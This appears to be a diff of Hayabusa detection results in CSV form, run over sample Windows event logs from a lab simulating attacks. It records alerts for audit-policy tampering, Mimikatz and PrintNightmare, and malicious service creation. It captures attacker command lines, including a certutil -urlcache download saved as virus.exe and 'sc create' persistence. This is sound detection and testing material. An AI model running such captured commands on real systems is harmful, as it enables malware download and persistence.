+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx
+2021-10-26 05:23:34.575 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-26 05:23:34.736 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
+2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-31 23:28:15.330 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.351 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.353 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.354 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:37:10.246 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-10-31 23:37:10.247 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-10-31 23:37:10.396 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-10-31 23:37:10.398 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-10-31 23:37:10.401 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-10-31 23:37:10.402 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
+2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
+2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
